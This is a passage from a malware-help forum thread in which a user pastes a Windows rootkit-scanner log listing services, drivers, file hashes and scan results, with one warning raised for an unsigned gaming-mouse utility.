0x0ce4 [ B730E963A31B73938A76D7B80666D60D, FADF452637E2EB50CC8C0E75956FE01F029C587F6EF2F8B347213263DE9D3A80 ] PhoneSvc C:\WINDOWS\System32\PhoneService.dll 21:27:08.0047 0x0ce4 PhoneSvc - ok 21:27:08.0053 0x0ce4 [ 97D85602B8131C487EB08A36F7343F5E, BEDC106AF06358D40BB034390645A5BFF9C138CFD51B5997D32614741D3D2372 ] PimIndexMaintenanceSvc C:\WINDOWS\System32\PimIndexMaintenance.dll 21:27:08.0064 0x0ce4 PimIndexMaintenanceSvc - ok 21:27:08.0088 0x0ce4 [ F9FB601621FF33376F3908C2C27C6EF4, 8689565D4FD1C68826EA0A9C2B44377A2AEC3CD812595F0D32904D8FA5809672 ] pla C:\WINDOWS\system32\pla.dll 21:27:08.0128 0x0ce4 pla - ok 21:27:08.0134 0x0ce4 [ A2BACEBAC01BE7A6656B454E75C23262, 
C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] PlugPlay C:\WINDOWS\system32\umpnpmgr.dll 21:27:08.0153 0x0ce4 PlugPlay - ok 21:27:08.0161 0x0ce4 [ 414CA4DCC31D795882B25ADC1DACE779, AFD8D9AA24C64DD9569FDCBE65171810FE27AF24B8DD2941FECE6245EABB6AAC ] pmem C:\WINDOWS\System32\drivers\pmem.sys 21:27:08.0170 0x0ce4 pmem - ok 21:27:08.0173 0x0ce4 [ D54385DD5A39A5636D1587FC9ECFC337, DEEA5D433CB2DA55AE58C7C5431A1249C94B61606F0A75E4A44D516619060263 ] PNRPAutoReg C:\WINDOWS\system32\pnrpauto.dll 21:27:08.0181 0x0ce4 PNRPAutoReg - ok 21:27:08.0188 0x0ce4 [ F5F10CE848CAF07A12A7B92290DBA38A, AC6AC13B692D07A6853B24A6396F1C3388586FD5D528F79FA3E373428D54D29A ] PNRPsvc C:\WINDOWS\system32\pnrpsvc.dll 21:27:08.0202 0x0ce4 PNRPsvc - ok 21:27:08.0211 0x0ce4 [ 118E91AEE8F6DDAD088F955498CF2487, F4447C64CF1F36432E0FF09B6712DCE61BF28E3499F20C6C69E80D98B42D671E ] PolicyAgent C:\WINDOWS\System32\ipsecsvc.dll 21:27:08.0229 0x0ce4 PolicyAgent - ok 21:27:08.0235 0x0ce4 [ 456DEA8B86DD28A2BAD65DC0F05B659E, CF23418563605C0255C903366D92F8A0C4CAA407000F509D558F676DD843DBCD ] Power C:\WINDOWS\system32\umpo.dll 21:27:08.0246 0x0ce4 Power - ok 21:27:08.0250 0x0ce4 [ D292D7FADCEE481CC64A9DE8FE9C3347, BD870A375E33CD8434CA97FFE9C2F84E58C6CD0EAEEEE8922172CB01F9674B55 ] PptpMiniport C:\WINDOWS\System32\drivers\raspptp.sys 21:27:08.0266 0x0ce4 PptpMiniport - ok 21:27:08.0306 0x0ce4 [ 5404E7A968A26DF03793B6F68536594D, BE5A85581E87EFE4DB43AD17B8D42D3F7F32364AEEC1416DBB94279C4A203FF2 ] PrintNotify C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll 21:27:08.0371 0x0ce4 PrintNotify - ok 21:27:08.0381 0x0ce4 [ D57CF871B3977731A91FE9611A54C7C1, B6C7F685716A88D0978377B83C5320C88EED0CAA44A001849AAFF71E4E0682E7 ] Processor C:\WINDOWS\System32\drivers\processr.sys 21:27:08.0391 0x0ce4 Processor - ok 21:27:08.0410 0x0ce4 [ 9ED60073731578E355E120327622C5DC, 863B4C7C0444E8EB212932739F68910F5E4C8F2677F0CB92381EBF6CB0AB7CC0 ] ProductAgentService C:\Program Files\Bitdefender 
Agent\ProductAgentService.exe 21:27:08.0431 0x0ce4 ProductAgentService - ok 21:27:08.0440 0x0ce4 [ 56A7713DE64B16FB309D132E88FDB098, A658C8DCA87442F33B726A9B2060B20393D83B8658D0894C046CAFEAB00E2D8A ] ProfSvc C:\WINDOWS\system32\profsvc.dll 21:27:08.0457 0x0ce4 ProfSvc - ok 21:27:08.0462 0x0ce4 [ B60431D2A046AD97F8427F6E568370F5, CD488E343585A5AC19D9AAF88BF0BB7EEA1BC48F6DA4A4FBF9BE5A04ECF5040B ] Psched C:\WINDOWS\system32\drivers\pacer.sys 21:27:08.0469 0x0ce4 Psched - ok 21:27:08.0474 0x0ce4 [ 80072EED0FDBC77E1F245B27995A40F2, E83B85B81A72CA67E4797017A0E44CF6074F49AD0BA1F0B7342C889CAA714B29 ] PSINAflt C:\WINDOWS\system32\DRIVERS\PSINAflt.sys 21:27:08.0481 0x0ce4 PSINAflt - ok 21:27:08.0485 0x0ce4 [ 19BEE6C83EF303FF186B2756BC6C7CB1, A48D0601C2516003DFBB55C6097A0C193B9D71F788876D34B71BAB7802B48FAE ] PSINFile C:\WINDOWS\system32\DRIVERS\PSINFile.sys 21:27:08.0491 0x0ce4 PSINFile - ok 21:27:08.0496 0x0ce4 [ 256A4A55910490B97DD4046428680CE9, 093A958E75DFA1A6FE5EFEE2FAEF867BD255958C92B389D6EDDD82D8AE185E62 ] PSINKNC C:\WINDOWS\system32\DRIVERS\PSINKNC.sys 21:27:08.0503 0x0ce4 PSINKNC - ok 21:27:08.0508 0x0ce4 [ 24E82387D730C4EAD43D1C3D0714F0E2, 06F1EB7529839C5375437DB2CD1840BA3F6227929A175E5058750B8BAC4A6626 ] PSINProc C:\WINDOWS\system32\DRIVERS\PSINProc.sys 21:27:08.0514 0x0ce4 PSINProc - ok 21:27:08.0518 0x0ce4 [ 7DF81D950D0A4A7D855B8C3A1BC96915, AC3F51F034E2EFDDE287AD912B01D63121873C3EBEE034E09C742247CCE25985 ] PSINProt C:\WINDOWS\system32\DRIVERS\PSINProt.sys 21:27:08.0525 0x0ce4 PSINProt - ok 21:27:08.0529 0x0ce4 [ A546D3C1C5B3B58FE46757F475F523D0, C8825E3E377BA0E78928250B3D8E2E1562F4F6E5BB05E6548E71DB197CEDD588 ] PSINReg C:\WINDOWS\system32\DRIVERS\PSINReg.sys 21:27:08.0535 0x0ce4 PSINReg - ok 21:27:08.0538 0x0ce4 [ F803473CD0E5D36D02EB58109F1294CD, DB6FFB4100BD35D491FF1C61FB3073049C2C18038D004A6D1E279A95AB8BA2EC ] PSKMAD C:\WINDOWS\system32\DRIVERS\PSKMAD.sys 21:27:08.0546 0x0ce4 PSKMAD - ok 21:27:08.0553 0x0ce4 [ E0DCCA2A78516D155A6485CCA99F0EA5, 
|
21.05.2017, 20:30 | #10 |
| Trojan, adware or something else? Code:
148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys 21:27:12.0644 0x0ce4 wanarp - ok 21:27:12.0647 0x0ce4 [ FDD16EF9177A8A2EF08A7FA3D3EFAA13, 148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarpv6 C:\WINDOWS\system32\DRIVERS\wanarp.sys 21:27:12.0662 0x0ce4 wanarpv6 - ok 21:27:12.0684 0x0ce4 [ EA0524A2A01792796EC80AE2FE08307A, 68CC0F3451C6797222411C276376C7741C96C45E628DD77FB1FB17C10DC0EA8A ] wbengine C:\WINDOWS\system32\wbengine.exe 21:27:12.0724 0x0ce4 wbengine - ok 21:27:12.0740 0x0ce4 [ 5E3E24AA72FA75D6322C7286917BEB4A, 97D0CF00873A5A70C1B4A73AD41F4053B22810DA37FF2E8528D510216311FEE1 ] WbioSrvc C:\WINDOWS\System32\wbiosrvc.dll 21:27:12.0767 0x0ce4 WbioSrvc - ok 21:27:12.0772 0x0ce4 [ 2B7CCCFBB166100842D31440228588CF, FC0BE611C5497A0579E7D8F268BBE1BD520A8A764F112C7C5CC631767B683B79 ] wcifs C:\WINDOWS\system32\drivers\wcifs.sys 21:27:12.0780 0x0ce4 wcifs - ok 21:27:12.0793 0x0ce4 [ E00FE13E415C97C60E5A418965372A74, E74EBE34D3056F52231C7B12E6294AED1C4F02219E853D5E70AA05D823C800D5 ] Wcmsvc C:\WINDOWS\System32\wcmsvc.dll 21:27:12.0818 0x0ce4 Wcmsvc - ok 21:27:12.0827 0x0ce4 [ 2C396871F724DDF871A2EF4CADE5151D, 8CAD8A393F0CC447432E1BED21A691E25356F7DBC06E3887138A6F86CB1D656D ] wcncsvc C:\WINDOWS\System32\wcncsvc.dll 21:27:12.0844 0x0ce4 wcncsvc - ok 21:27:12.0848 0x0ce4 [ 1737BEF60CA384423CE4B32AF1C2BFFC, D61353D3B2EAEDFDCBB5DB3AD27E76396CC7755AFF01233307EAA1967493DE63 ] wcnfs C:\WINDOWS\system32\drivers\wcnfs.sys 21:27:12.0856 0x0ce4 wcnfs - ok 21:27:12.0859 0x0ce4 [ 38130C1C5FE0E08820EE57E1B087B659, 3705AA4699D4C402C0BBC5BC4E1EE67CB4A4B9C27702E88952A76891C3A3F496 ] WdBoot C:\WINDOWS\system32\drivers\WdBoot.sys 21:27:12.0866 0x0ce4 WdBoot - ok 21:27:12.0881 0x0ce4 [ 0C6CBF3490EE5F0D62B5820568CA30B8, 97EDEC84DA72A900D7740B8763DDDAB600628F3F1E1DDE1212383C2E60FDC77C ] Wdf01000 C:\WINDOWS\system32\drivers\Wdf01000.sys 21:27:12.0899 0x0ce4 Wdf01000 - ok 21:27:12.0906 0x0ce4 [ 
F7B6CB0F9ECD28848E2BDACEAB0D9204, B64D91A36600AEBE656F0514AF8653C294DE88054FE6DBB7B1A6D0A23D2A5131 ] WdFilter C:\WINDOWS\system32\drivers\WdFilter.sys 21:27:12.0916 0x0ce4 WdFilter - ok 21:27:12.0920 0x0ce4 [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiServiceHost C:\WINDOWS\system32\wdi.dll 21:27:12.0932 0x0ce4 WdiServiceHost - ok 21:27:12.0935 0x0ce4 [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiSystemHost C:\WINDOWS\system32\wdi.dll 21:27:12.0947 0x0ce4 WdiSystemHost - ok 21:27:12.0961 0x0ce4 [ 2974422E31DBC953A585A065EF736948, B2E689579C12B1A8B2CB4F04875157E894CE747DF56A9B7083E04A8C9B85EAC5 ] wdiwifi C:\WINDOWS\system32\DRIVERS\wdiwifi.sys 21:27:12.0989 0x0ce4 wdiwifi - ok 21:27:12.0994 0x0ce4 [ 82A4F22C884B4BAE8B531640859F9871, 1C662557F671FA680E7CC2FC565B198470E421778BD03749CD05B2928568C430 ] WdNisDrv C:\WINDOWS\system32\Drivers\WdNisDrv.sys 21:27:13.0001 0x0ce4 WdNisDrv - ok 21:27:13.0003 0x0ce4 WdNisSvc - ok 21:27:13.0009 0x0ce4 [ 9066FE8EAB91E15437CB3C43757F2A65, 1F8B3D8C90C7862CCAB91D170F49E7F1D58FABAFA1C8DDDE1796404D1DD98707 ] WebClient C:\WINDOWS\System32\webclnt.dll 21:27:13.0023 0x0ce4 WebClient - ok 21:27:13.0029 0x0ce4 [ F322B8E6C5614E7975C8BF34B7A6710E, 299816001856E8C91BFBB9C48D87B7ACBD5A39F6A65147F5AE6EDB3065A893E9 ] Wecsvc C:\WINDOWS\system32\wecsvc.dll 21:27:13.0041 0x0ce4 Wecsvc - ok 21:27:13.0044 0x0ce4 [ 04CA184EB5743DE5A2CCEEF2DB2DA8B3, E16921496F57B78A152A103F8D58601C9687360048A6CB51E76A96E3B64CC0FA ] WEPHOSTSVC C:\WINDOWS\system32\wephostsvc.dll 21:27:13.0054 0x0ce4 WEPHOSTSVC - ok 21:27:13.0058 0x0ce4 [ BA78F20F7FD7709EA3AAAD91F8535EDA, D1DFBFCBBB8D4D992FBF3B340DB6A2F5DDC7E55F52E1100297EA2004FF752A2B ] wercplsupport C:\WINDOWS\System32\wercplsupport.dll 21:27:13.0070 0x0ce4 wercplsupport - ok 21:27:13.0075 0x0ce4 [ E5AE3B23620126483B957BDFF38FE7B7, 306AAA0B37F3914FE590A5DBFBF640C79173150C006BC7A6CF1683D85C0AFC5F ] 
WerSvc C:\WINDOWS\System32\WerSvc.dll 21:27:13.0086 0x0ce4 WerSvc - ok 21:27:13.0096 0x0ce4 [ 51D61CA3CED9A0C4E5501EEDBD48039F, 95F9CC67537DEABE501B59351624F02126BC9B9DBB72016423FF997090A2128B ] WFDSConMgrSvc C:\WINDOWS\System32\wfdsconmgrsvc.dll 21:27:13.0123 0x0ce4 WFDSConMgrSvc - ok 21:27:13.0128 0x0ce4 [ 3C8F0ABD00E197101DCF43FEF8FB0D76, AF5C68B85EE1503ACD4AEA1D997F816C34293A77791D59A605DC18450B4906DE ] WFPLWFS C:\WINDOWS\system32\drivers\wfplwfs.sys 21:27:13.0136 0x0ce4 WFPLWFS - ok 21:27:13.0140 0x0ce4 [ 2DEB40D6837956CE08A8F9EB3ECA5A01, B40D23E54CDF6BE05D6C5DA536BF6D998E79EDE9C391A42452F9F69EE206EA1E ] WiaRpc C:\WINDOWS\System32\wiarpc.dll 21:27:13.0149 0x0ce4 WiaRpc - ok 21:27:13.0153 0x0ce4 [ 75014BF6510D4C6C69EEE5B7743A52AF, 11AEEF4D52C35E5A7006713836ECF1198A53CD02736E792B1C698144CA1363F0 ] WIMMount C:\WINDOWS\system32\drivers\wimmount.sys 21:27:13.0158 0x0ce4 WIMMount - ok 21:27:13.0160 0x0ce4 WinDefend - ok 21:27:13.0166 0x0ce4 [ C8EBCFED8FD2CDF725E44AF93016621E, A0B76E55CC535A0F1D79C3C0EC59753086EAB669EC7ADA4F97656DCAD2A69448 ] WindowsTrustedRT C:\WINDOWS\system32\drivers\WindowsTrustedRT.sys 21:27:13.0173 0x0ce4 WindowsTrustedRT - ok 21:27:13.0176 0x0ce4 [ D318557F9D7CA3836104F0B8ECB1F32E, 6850BBFB4F65167B052F3CA22FD72E9188A14FD2A9CC085861B4BC40CBA34249 ] WindowsTrustedRTProxy C:\WINDOWS\system32\drivers\WindowsTrustedRTProxy.sys 21:27:13.0182 0x0ce4 WindowsTrustedRTProxy - ok 21:27:13.0196 0x0ce4 [ 61F0D6574577499FB43D9F4870B08A7F, 757ACD4F292C43B04B6428D84A7147DE8E565716D94B6B02F288F3B5E2D1C135 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll 21:27:13.0217 0x0ce4 WinHttpAutoProxySvc - ok 21:27:13.0221 0x0ce4 [ 31DDF1D001336B2DCE7DF24E99EF1D04, A1FCABF4A263BFAE042FE7A9F6C15FD9B3D8E985278C32AE8975ECE79B341277 ] WinMad C:\WINDOWS\System32\drivers\winmad.sys 21:27:13.0226 0x0ce4 WinMad - ok 21:27:13.0234 0x0ce4 [ 9A26F7834706A6D8C8824EB08FD7C362, 750F6A0759D70BE481C70FE4BB21D18E756A8F0C23A014C2CE1E7729A1E625FE ] Winmgmt 
C:\WINDOWS\system32\wbem\WMIsvc.dll 21:27:13.0250 0x0ce4 Winmgmt - ok 21:27:13.0256 0x0ce4 [ 2E1A614EFB0523E20860AE7978DDA0A4, E13564690F9977747CA676D3843B467506447F060A5FF6676835A9C7A30BA409 ] WinNat C:\WINDOWS\system32\drivers\winnat.sys 21:27:13.0266 0x0ce4 WinNat - ok 21:27:13.0305 0x0ce4 [ 27DAA9AA3E03C1068678D5659461BB32, AFDED6D671C430F296C9EAA73590111D6A8A9FA93DFE0595B90467FFE28EFB35 ] WinRM C:\WINDOWS\system32\WsmSvc.dll 21:27:13.0376 0x0ce4 WinRM - ok 21:27:13.0384 0x0ce4 [ 03858B18BB6DF6A400D9FC5153FD28A8, C7AD69B022AEFDDDAFB74CCCDF20AF9CCDBA0097634BBBD07A2EFBA5922560C1 ] WINUSB C:\WINDOWS\System32\drivers\WinUSB.SYS 21:27:13.0392 0x0ce4 WINUSB - ok 21:27:13.0396 0x0ce4 [ 0BF4A43CF1F3A4D50AFA4561C3B4628D, 2D0B4E7004C8AC8A9EE07E6D5241BF32395CA142BF3B03FA9CF00BC6720A6AC7 ] WinVerbs C:\WINDOWS\System32\drivers\winverbs.sys 21:27:13.0402 0x0ce4 WinVerbs - ok 21:27:13.0414 0x0ce4 [ 11DDD4C9BDF095A5F5B5ACA98FBBF7A2, CFA76C197987CC9EBFE4AC2AD6FE9A9620819B50E9DD423BCE13F7DB5DA641D8 ] wisvc C:\WINDOWS\system32\flightsettings.dll 21:27:13.0436 0x0ce4 wisvc - ok 21:27:13.0470 0x0ce4 [ E624376E7E7D9AC203113140D9E618A2, 3553D343665194492E38B8C437DE429CEAC135D69EC0CB951BA3E3A7549F673E ] WlanSvc C:\WINDOWS\System32\wlansvc.dll 21:27:13.0534 0x0ce4 WlanSvc - ok 21:27:13.0566 0x0ce4 [ 2393C4DB3DF3D19B0B920AD607098E79, D632671247DE3808D9C5B36A3FF173C86BB3AD274D03C851BCD417CE62B3820D ] wlidsvc C:\WINDOWS\system32\wlidsvc.dll 21:27:13.0619 0x0ce4 wlidsvc - ok 21:27:13.0640 0x0ce4 [ E5AB2E0B4F766E34AFC768D9769A24D7, 0DE04B2F43B9DCC92F9215B1058EE4ABA228B9986051CF39959555C12DF017B3 ] wlpasvc C:\WINDOWS\System32\lpasvc.dll 21:27:13.0680 0x0ce4 wlpasvc - ok 21:27:13.0684 0x0ce4 [ 0D6E1347A891607759340B1E55BA2A77, 033DF14920A581FE7E21C6930280AE159B5634F2FEAF79423E8D0B7D46500048 ] WmiAcpi C:\WINDOWS\System32\drivers\wmiacpi.sys 21:27:13.0691 0x0ce4 WmiAcpi - ok 21:27:13.0697 0x0ce4 [ F7B122E8A238354DE344B77216E8D9AC, 3C4F864655CFF786B33333E643AA929B2D2B01ECD56EEEEADE7CEAB38249DA3B 
] wmiApSrv C:\WINDOWS\system32\wbem\WmiApSrv.exe 21:27:13.0713 0x0ce4 wmiApSrv - ok 21:27:13.0715 0x0ce4 WMPNetworkSvc - ok 21:27:13.0720 0x0ce4 [ 1AE1076034392218EE89D2744EC2A071, 695C28E2697B12BBD919687176CE082E94887A5D8B6229F163A26F6EDF401C4C ] Wof C:\WINDOWS\system32\drivers\Wof.sys 21:27:13.0729 0x0ce4 Wof - ok 21:27:13.0756 0x0ce4 [ D571821EDAA1F23EB521314FB9AA1C88, 7F16E6915060BD5FABE0805284631F92EEC11234579D09C3CEDDBF73D312E7F5 ] workfolderssvc C:\WINDOWS\system32\workfolderssvc.dll 21:27:13.0800 0x0ce4 workfolderssvc - ok 21:27:13.0805 0x0ce4 [ 2AD9CC8445F0E1A8900A9DE123643CD2, A5928B26722DFBB201A32DEF48B25D4BF291815EA68CF50CBE79EEA9260A71E3 ] WPDBusEnum C:\WINDOWS\system32\wpdbusenum.dll 21:27:13.0815 0x0ce4 WPDBusEnum - ok 21:27:13.0819 0x0ce4 [ 1FD80CBB192A20375F3664639DEB57B5, 7A4789D4B2F8E289726E1C723DC00D5AC1F8C5E00FB2879C9D0E6DDC97D2B1A6 ] WpdUpFltr C:\WINDOWS\system32\drivers\WpdUpFltr.sys 21:27:13.0824 0x0ce4 WpdUpFltr - ok 21:27:13.0831 0x0ce4 [ 3369EF007E43B88EAC8F1789B43D4393, 347F9F7DF980BB739895EDFE72E2E595EF56634330DC63DAA36403AB232B5B5A ] WpnService C:\WINDOWS\system32\WpnService.dll 21:27:13.0844 0x0ce4 WpnService - ok 21:27:13.0848 0x0ce4 [ 41403B9466EDA80FACD7713478A56DF8, A71BF9C7A2483FE1F660AC9688FCB38BA2310F16A69EB117C948458364953F34 ] WpnUserService C:\WINDOWS\System32\WpnUserService.dll 21:27:13.0858 0x0ce4 WpnUserService - ok 21:27:13.0862 0x0ce4 [ DAF4451760B46CB383D287C4FAFFE97D, 658AFE31EF50E934FEDD2E7048257DBFE9E6DE5F1ACDC658B21737391CF1CC5A ] ws2ifsl C:\WINDOWS\system32\drivers\ws2ifsl.sys 21:27:13.0874 0x0ce4 ws2ifsl - ok 21:27:13.0880 0x0ce4 [ D4A0661AB0FE542460CA76BFB4FAA2D6, 149F0A0720C47BFFCA68165A46382E5CBB273F48483DBB598CEA320801664718 ] wscsvc C:\WINDOWS\System32\wscsvc.dll 21:27:13.0893 0x0ce4 wscsvc - ok 21:27:13.0896 0x0ce4 [ F6E37A2C168A58F0172DA50018959228, C97305641F63BC84F5207A739F442ACB0A5FD9262331BB61C4B00CF2C6D94121 ] WSDPrintDevice C:\WINDOWS\System32\drivers\WSDPrint.sys 21:27:13.0903 0x0ce4 WSDPrintDevice 
- ok 21:27:13.0907 0x0ce4 [ F454BF3F0D3F19057B8612CA523D22D5, 869EC91E7D709C15ADF9D53C82A87F2D5220ED3CA44CEBF34F4D601E78DA0481 ] WSDScan C:\WINDOWS\system32\DRIVERS\WSDScan.sys 21:27:13.0915 0x0ce4 WSDScan - ok 21:27:13.0918 0x0ce4 WSearch - ok 21:27:13.0954 0x0ce4 [ 05BEDBBEEAAC22F98FCA529FAC659582, E4D2FFF98034E2E7FE0478AB9C8D677CA932349A976DFC0C2B65DB15C71354B4 ] wuauserv C:\WINDOWS\system32\wuaueng.dll 21:27:14.0011 0x0ce4 wuauserv - ok 21:27:14.0017 0x0ce4 [ 455609BF60DA3B57EEAB863DEFCCF14D, F55271C42B7AFD17D01275703719C1F52C21996DB82AC78A70A8A8B62370623B ] WudfPf C:\WINDOWS\system32\drivers\WudfPf.sys 21:27:14.0026 0x0ce4 WudfPf - ok 21:27:14.0032 0x0ce4 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFRd C:\WINDOWS\System32\drivers\WUDFRd.sys 21:27:14.0044 0x0ce4 WUDFRd - ok 21:27:14.0049 0x0ce4 [ 9EFE23CA208BF4B613FF4A6028DFAB10, 483D8D8DA578BF3EA5617EAB42457543EC6F97C1977BDD8ABFDF854AE3AAFD35 ] wudfsvc C:\WINDOWS\System32\WUDFSvc.dll 21:27:14.0060 0x0ce4 wudfsvc - ok 21:27:14.0066 0x0ce4 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFWpdFs C:\WINDOWS\system32\DRIVERS\WUDFRd.sys 21:27:14.0078 0x0ce4 WUDFWpdFs - ok 21:27:14.0100 0x0ce4 [ 3EEF7185E0974D9AB2D65CA3214132CF, 44DB1D11B6B1D180F59AB3FE4D7235F7F2FD709A853F6A64E8E379FFFD16CD3C ] WwanSvc C:\WINDOWS\System32\wwansvc.dll 21:27:14.0146 0x0ce4 WwanSvc - ok 21:27:14.0154 0x0ce4 [ FC0147AB34C7CDB2D8A1B29C207F2CD1, 737D40A4BE35AD13C091D8E320FAD3FD7C0C7E41C8B50E48D3C2151712A55718 ] xbgm C:\WINDOWS\System32\xbgmsvc.dll 21:27:14.0166 0x0ce4 xbgm - ok 21:27:14.0182 0x0ce4 [ 8C7C5945C3545CA767BE111D78C15314, 5A938679DA3EDA2D9CA7034908DFEFCC7DAADB10DFD0CF4ECE882FF536D1BFA2 ] XblAuthManager C:\WINDOWS\System32\XblAuthManager.dll 21:27:14.0214 0x0ce4 XblAuthManager - ok 21:27:14.0233 0x0ce4 [ A8BD191F46CC58E45637CB3E262CF0F2, CA65524427ECDB5E1138A5F8E885566064E507BA60FC31E0D9D17B9556CC9ADC ] 
XblGameSave C:\WINDOWS\System32\XblGameSave.dll 21:27:14.0265 0x0ce4 XblGameSave - ok 21:27:14.0272 0x0ce4 [ 3AC720A97FE4B6325F3012B21AF74390, 41AC655BD5CE5016BAA482534D1CEA6E11EAECE121344B45A5C8DF84A83807F4 ] xboxgip C:\WINDOWS\System32\drivers\xboxgip.sys 21:27:14.0284 0x0ce4 xboxgip - ok 21:27:14.0287 0x0ce4 [ E099DED5C602AE4A7ECCF7CD4B1D2E33, 7FDAFFE13B87A8E6AA8721F8905FFF6EF04CAB93009F68EDA862B57EBB04514F ] XboxGipSvc C:\WINDOWS\System32\XboxGipSvc.dll 21:27:14.0296 0x0ce4 XboxGipSvc - ok 21:27:14.0312 0x0ce4 [ 8489AA1A36074B3487BFDA8A9FDBAB3D, 59337C1F65AF42820260FCE271D18C2221B64A5E53005A11ECF397F651031C6A ] XboxNetApiSvc C:\WINDOWS\system32\XboxNetApiSvc.dll 21:27:14.0348 0x0ce4 XboxNetApiSvc - ok 21:27:14.0352 0x0ce4 [ 2E50A379A8E4F6C5D85E87C26C08D329, ADA0C344FE58A3772FFF7417268160E488741C5B2F08CA12ED587AB7F75756F6 ] xinputhid C:\WINDOWS\System32\drivers\xinputhid.sys 21:27:14.0360 0x0ce4 xinputhid - ok 21:27:14.0361 0x0ce4 ================ Scan global =============================== 21:27:14.0365 0x0ce4 [ EEA8447A2E39A39F66C74BA66C421F92, 7FFC5294E0D0438E7450ED36947AB04D0C84DF4E1C9F2D49340D3BA586FFFAB2 ] C:\WINDOWS\system32\basesrv.dll 21:27:14.0368 0x0ce4 [ A42970F5DAA633B35322F200C39DF4CF, 91EEA2A5BA8FF0CBCB058218B01E747D29ADE4544AFC5474C71DB380866B4F2E ] C:\WINDOWS\system32\winsrv.dll 21:27:14.0373 0x0ce4 [ 7DD72CBE412C9567661F4B1CE9631FC1, 8D914805CBDAF448C8C132C4C3FEB1D90804F4F485180F7364A75EC5655A4DDB ] C:\WINDOWS\system32\sxssrv.dll 21:27:14.0385 0x0ce4 [ 800D00D1A7ADA9E341CACDF287347584, 70AD5A458203B35F227F3F6B4783D00424C96AA9E29DB3090CEC8C00E62CD8E5 ] C:\WINDOWS\system32\services.exe 21:27:14.0392 0x0ce4 [ Global ] - ok 21:27:14.0393 0x0ce4 ================ Scan MBR ================================== 21:27:14.0394 0x0ce4 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0 21:27:14.0442 0x0ce4 \Device\Harddisk0\DR0 - ok 21:27:14.0444 0x0ce4 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk1\DR1 21:27:14.0537 0x0ce4 
\Device\Harddisk1\DR1 - ok 21:27:14.0537 0x0ce4 ================ Scan VBR ================================== 21:27:14.0540 0x0ce4 [ 351CECEC6A59AE7E66C90571BB64BDAD ] \Device\Harddisk0\DR0\Partition1 21:27:14.0541 0x0ce4 \Device\Harddisk0\DR0\Partition1 - ok 21:27:14.0542 0x0ce4 [ B8EFACFC8DDDACD5C7BB953E94688084 ] \Device\Harddisk0\DR0\Partition2 21:27:14.0543 0x0ce4 \Device\Harddisk0\DR0\Partition2 - ok 21:27:14.0544 0x0ce4 [ 7CDAA8D0E7BFAF4494CB22AEA4D87AD1 ] \Device\Harddisk1\DR1\Partition1 21:27:14.0545 0x0ce4 \Device\Harddisk1\DR1\Partition1 - ok 21:27:14.0546 0x0ce4 ================ Scan generic autorun ====================== 21:27:14.0546 0x0ce4 SecurityHealth - ok 21:27:14.0658 0x0ce4 [ 912858EE253CA62AC0DC326BB556273B, 6E2BBDA20BB439AE8215FAE7FEDA3DE72F74A336435CE2567E36741D0682B9E5 ] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe 21:27:14.0775 0x0ce4 RTHDVCPL - ok 21:27:14.0793 0x0ce4 [ ED43758BF94B8A5221D69F1B7F63F13D, F6E7418823E45085F4D4F50DD25A55ED517C0A335C6C2F69A1139B30677D3DA9 ] C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe 21:27:14.0809 0x0ce4 XboxStat - ok 21:27:14.0818 0x0ce4 [ F8A8125BF28F03D79CDEA5B0B69FF60B, 13E5DE36EB61384B0726447442F0CE4838C20E4F3F730B9B9BB84A2020A68A82 ] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe 21:27:14.0827 0x0ce4 IJNetworkScannerSelectorEX - ok 21:27:14.0832 0x0ce4 [ CD0362AEE36CFE1EF5DF973230742E67, 9F1D8AD4E09D16C39CD6A35CB298456468C1808226FFA8AD65BF9562A6ECC07D ] C:\Program Files (x86)\PDF24\pdf24.exe 21:27:14.0841 0x0ce4 PDFPrint - ok 21:27:14.0846 0x0ce4 [ ED13374E76D833772A687EA3594C1120, 3A2A0C41DED8555ACEB9CAAE7F9C0053B11CEE1877B06D993BDCA0E491DB6CE6 ] C:\Program Files (x86)\Drakonia Configurator\hid.exe 21:27:14.0854 0x0ce4 GamingMouse - detected UnsignedFile.Multi.Generic ( 1 ) 21:27:15.0210 0x0ce4 GamingMouse ( UnsignedFile.Multi.Generic ) - warning 21:27:15.0737 0x0ce4 [ 450FDD861FD582026BDCE55FCB2162C4, 
91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe 21:27:16.0017 0x0ce4 OneDriveSetup - ok 21:27:16.0290 0x0ce4 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe 21:27:16.0567 0x0ce4 OneDriveSetup - ok 21:27:16.0604 0x0ce4 [ 39F07FEA9532CD88F388ECABEFE37CD2, 59A73628DE72CAFA0B8A3E22054EEEF85820AD012BC68E279A4B5E0B728E9621 ] C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe 21:27:16.0628 0x0ce4 Spotify Web Helper - ok 21:27:16.0651 0x0ce4 [ 00F30FDFDE3E276C1A731C2DF951D67E, 018E6933882FCC41EE96E198E6F7ECEFB53EC650B1044A58876B26EDE011158B ] C:\Users\Dino\AppData\Local\Microsoft\OneDrive\OneDrive.exe 21:27:16.0677 0x0ce4 OneDrive - ok 21:27:16.0694 